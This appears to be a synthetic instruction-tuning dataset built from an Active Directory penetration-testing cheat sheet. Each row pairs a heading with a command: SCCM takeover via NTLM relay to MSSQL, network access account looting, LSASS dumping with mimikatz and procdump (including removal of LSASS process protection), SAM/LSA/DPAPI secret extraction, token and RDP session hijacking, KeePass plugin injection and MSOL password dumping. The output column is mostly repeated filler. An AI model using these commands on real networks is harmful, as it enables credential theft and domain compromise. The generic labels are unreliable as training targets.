instruction
stringclasses
270 values
input
stringlengths
3
214
output
stringclasses
297 values
CRED-6 Loot creds
SCCM HTTP service (80/TCP or 443/TCP) on a DP
Note or procedural step under 'CRED-6 Loot creds'.
CRED-6 Loot creds
SCCMSecrets.py policies -mp http://<management_point> -u '<machine_account>$' -p '<machine_password>' -cn '<client_name>'
Note or procedural step under 'CRED-6 Loot creds'.
CRED-6 Loot creds
SCCMSecrets.py files -dp http://<distribution_point> -u '<user>' -p '<password>'
Note or procedural step under 'CRED-6 Loot creds'.
CRED-6 Loot creds
sccm-http-looter -server <ip_dp>
Note or procedural step under 'CRED-6 Loot creds'.
Takeover-1:relay to mssql db Simple user
SCCM MSSQL != SSCM server
Note or procedural step under 'Takeover-1:relay to mssql db Simple user'.
Takeover-1:relay to mssql db Simple user
sccmhunter.py mssql -u <user> -p <password> -d <domain> -dc-ip <dc_ip> -debug -tu <target_user> -sc <site_code> -stacked
Note or procedural step under 'Takeover-1:relay to mssql db Simple user'.
Takeover-1:relay to mssql db Simple user
ntlmrelayx.py -smb2support -ts -t mssql://<sccm_mssql> -q "<query>"
Note or procedural step under 'Takeover-1:relay to mssql db Simple user'.
Takeover-1:relay to mssql db Simple user
coerce sccm_mssql -> attacker
Note or procedural step under 'Takeover-1:relay to mssql db Simple user'.
Takeover-1:relay to mssql db Simple user
sccmhunter.py admin -u <target_user>@<domain> -p '<password>' -ip <sccm_ip> #SCCM ADMIN
Note or procedural step under 'Takeover-1:relay to mssql db Simple user'.
Takeover-2:relay to mssql server Simple user
SCCM MSSQL != SSCM server
Note or procedural step under 'Takeover-2:relay to mssql server Simple user'.
Takeover-2:relay to mssql server Simple user
ntlmrelayx.py -t <sccm_mssql> -smb2support -socks
Note or procedural step under 'Takeover-2:relay to mssql server Simple user'.
Takeover-2:relay to mssql server Simple user
coerce sccm_server
Note or procedural step under 'Takeover-2:relay to mssql server Simple user'.
Takeover-2:relay to mssql server Simple user
proxychains smbexec.py -no-pass <domain>/'<sccm_server>$'@<sccm_ip> #Admin MSSQL
Note or procedural step under 'Takeover-2:relay to mssql server Simple user'.
Creds-2:Policy Request Credentials Simple user
add computer
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-2:Policy Request Credentials Simple user
sccmwtf.py newcomputer newcomputer.<domain> <target> '<domain>\<computer_added>$' '<computer_pass>'
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-2:Policy Request Credentials Simple user
get NetworkAccessUsername and NetworkAccessPassword
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-2:Policy Request Credentials Simple user
policysecretunobfuscate.py
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-2:Policy Request Credentials Simple user
delete device created after sccmadmin #User + Pass
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-2:Policy Request Credentials Simple user
SharpSCCM.exe get secrets -r newcomputer -u <computer_added>$ -p <computer_pass>"
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-2:Policy Request Credentials Simple user
cleanup #User + Pass
Note or procedural step under 'Creds-2:Policy Request Credentials Simple user'.
Creds-3Creds-4 Computer Admin user
dploot.py sccm -u <admin> -p '<password>' <sccm_target> #NAA credentials
Note or procedural step under 'Creds-3Creds-4 Computer Admin user'.
Creds-3Creds-4 Computer Admin user
sccmhunter.py dpapi -u <admin> -p '<password>' -target <sccm_target> -debug #NAA credentials
Note or procedural step under 'Creds-3Creds-4 Computer Admin user'.
Creds-3Creds-4 Computer Admin user
SharpSCCM.exe local secrets -m disk #NAA credentials
Note or procedural step under 'Creds-3Creds-4 Computer Admin user'.
Creds-3Creds-4 Computer Admin user
SharpSCCM.exe local secrets -m wmi #NAA credentials
Note or procedural step under 'Creds-3Creds-4 Computer Admin user'.
Creds-5 SCCM admin
secretsdump.py <domain>/<admin>:'<pass>'@<sccm_target>
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Creds-5 SCCM admin
mssqlclient.py -windows-auth -hashes '<sccm_target_hashNT>' '<domain>/<sccm_target>$'@<sccm_mssql>
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
use CM_<site_code>;
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
SELECT * FROM SC_UserAccount;
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
sccmdecryptpoc.exe <cyphered_value> #Site DB credentials
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
get_device <hostname>
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
interact <device_id>
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
script xploit.ps1 #Site DB credentials
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
EXEC-1/2 SCCM admin
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
SharpSCCM.exe exec -p <binary> -d <device_name> -sms <SMS_PROVIDER> -sc <SITECODE> --no-banner #lat
Note or procedural step under 'Creds-5 SCCM admin'.
Creds-5 SCCM admin
sccmhunter.py admin -u <user>@<domain> -p '<password>' -ip <sccm_ip> #lat
Note or procedural step under 'Creds-5 SCCM admin'.
Cleanup
SharpSCCM.exe get devices -sms <SMS_PROVIDER> -sc <SITECODE> -n <NTLMRELAYX_LISTENER_IP> -p "Name" -p "ResourceId" -p "SMSUniqueIdentifier"
Note or procedural step under 'Cleanup'.
Cleanup
SharpSCCM.exe remove device GUID:<GUID> -sms <SMS_PROVIDER> -sc <SITECODE>
Note or procedural step under 'Cleanup'.
Post exploit
as sccm admin
Note or procedural step under 'Post exploit'.
Post exploit
SCCMHound.exe --server <server> --sitecode <sitecode>
Note or procedural step under 'Post exploit'.
Post exploit
Users sessions
Note or procedural step under 'Post exploit'.
Admin access
Extract credentials from LSASS.exe
Note or procedural step under 'Admin access'.
Admin access
LSASS as protected process
Note or procedural step under 'Admin access'.
Admin access
PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp #before 2022-07-22 update
Note or procedural step under 'Admin access'.
Admin access
mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process:lsass.exe" "!-"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Admin access
Extract LSASS secrets
Note or procedural step under 'Admin access'.
Admin access
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Note or procedural step under 'Admin access'.
Admin access
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Admin access
msf> load kiwi creds_all
Tool or command referenced under 'Admin access'.
Admin access
nxc smb <ip_range> -u <user> -p <password> -M lsassy
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Admin access
lsassy -d <domain> -u <user> -p <password> <ip>
Note or procedural step under 'Admin access'.
Extract credentials from SAM
nxc smb <ip_range> -u <user> -p <password> --sam
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Extract credentials from SAM
msf> hashdump
Tool or command referenced under 'Extract credentials from SAM'.
Extract credentials from SAM
mimikatz "privilege::debug" "lsadump::sam" "exit"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from SAM
secretsdump.py <domain>/<user>:<password>@<ip>
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from SAM
reg save HKLM\SAM <file>; reg save HKLM\SYSTEM <file>
Note or procedural step under 'Extract credentials from SAM'.
Extract credentials from SAM
secretsdump.py -system SYSTEM -sam SAM LOCAL
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from SAM
reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share'
Note or procedural step under 'Extract credentials from SAM'.
Extract credentials from SAM
secretsdump.py -system SYSTEM -sam SAM LOCAL
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from SAM
regsecrets.py <domain>/<user>:<password>@<ip>
Note or procedural step under 'Extract credentials from SAM'.
Extract credentials from LSA
nxc smb <ip_range> -u <user> -p <password> --lsa
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Extract credentials from LSA
mimikatz "privilege::debug" "lsadump::lsa" "exit"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from LSA
reg save HKLM\SECURITY <file>; reg save HKLM\SYSTEM <file>
Note or procedural step under 'Extract credentials from LSA'.
Extract credentials from LSA
secretsdump.py -system SYSTEM -security SECURITY
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from LSA
reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb_ip>\share'
Note or procedural step under 'Extract credentials from LSA'.
Extract credentials from DPAPI
DPAPI
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
nxc smb <ip_range> -u <user> -p <password> --dpapi [cookies] [nosystem]
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Extract credentials from DPAPI
donpapi <domain>/<user>:<password>@<target>
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
dpapidump.py <domain>/<user>:<password>@<target>
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
get masterkey
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
mimikatz "sekurlsa::dpapi"
Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints.
Extract credentials from DPAPI
dploot.py browser -d <domain> -u <user> -p '<password>' <ip> -mkfile <masterkeys_file>
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
lsassy -d <domain> -u <user> -p <password> <ip> -m rdrleakdiag -M masterkeys
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
dploot.py browser -d <domain> -u <user> -p '<password>' <ip> -mkfile <masterkeys_file>
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
SharpDPAPI.exe triage
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
Crack users masterkey
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
copy c:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID>
Note or procedural step under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
DPAPImk2john.py --preferred <prefered_file>
Tool or command referenced under 'Extract credentials from DPAPI'.
Extract credentials from DPAPI
DPAPImk2john.py -c domain -mk <masterkey> -S <sid> #DPAPImk
Tool or command referenced under 'Extract credentials from DPAPI'.
Impersonate
Impersonate
Note or procedural step under 'Impersonate'.
Impersonate
msf> use incognito impersonate_token <domain>\\<user>
Tool or command referenced under 'Impersonate'.
Impersonate
nxc smb <ip> -u <localAdmin> -p <password> --loggedon-users
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Impersonate
nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Impersonate
irs.exe list
Note or procedural step under 'Impersonate'.
Impersonate
irs.exe exec -p <pid> -c <command>
Note or procedural step under 'Impersonate'.
Impersonate
Impersonate with adcs
Note or procedural step under 'Impersonate'.
Impersonate
masky - d <domain> -u <user> (-p <password> || -k || -H <hash>) -ca <certificate authority> <ip>
Note or procedural step under 'Impersonate'.
Impersonate
Impersonate RDP Session
Note or procedural step under 'Impersonate'.
Impersonate
psexec.exe -s -i cmd
Note or procedural step under 'Impersonate'.
Impersonate
query user
Note or procedural step under 'Impersonate'.
Impersonate
tscon.exe <id> /dest:<session_name> #RDP
Note or procedural step under 'Impersonate'.
Misc
Find Users
Note or procedural step under 'Misc'.
Misc
smbmap.py --host-file ./computers.list -u <user> -p <password> -d <domain> -r 'C$\Users' --dir-only --no-write-check --no-update --no-color --csv users_directory.csv
Note or procedural step under 'Misc'.
Misc
Extract Keepass
Note or procedural step under 'Misc'.
Misc
KeePwn.py plugin add -u '<user>' -p '<password>' -d '<domain>' -t <target> --plugin KeeFarceRebornPlugin.dll
Note or procedural step under 'Misc'.
Misc
KeePwn.py trigger add -u '<user>' -p '<password>' -d '<domain>' -t <target>
Note or procedural step under 'Misc'.
Misc
Hybrid (Azure AD-Connect)
Note or procedural step under 'Misc'.
Misc
Dump cleartext password of MSOL Account on ADConnect Server
Note or procedural step under 'Misc'.
Misc
azuread_decrypt_msol_v2.ps1 #DCSYNC
Note or procedural step under 'Misc'.
Misc
nxc smb <ip> -u <user> -p <password> -M msol #DCSYNC
NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes.
Clear text Password
Interactive-shell - psexec
Note or procedural step under 'Clear text Password'.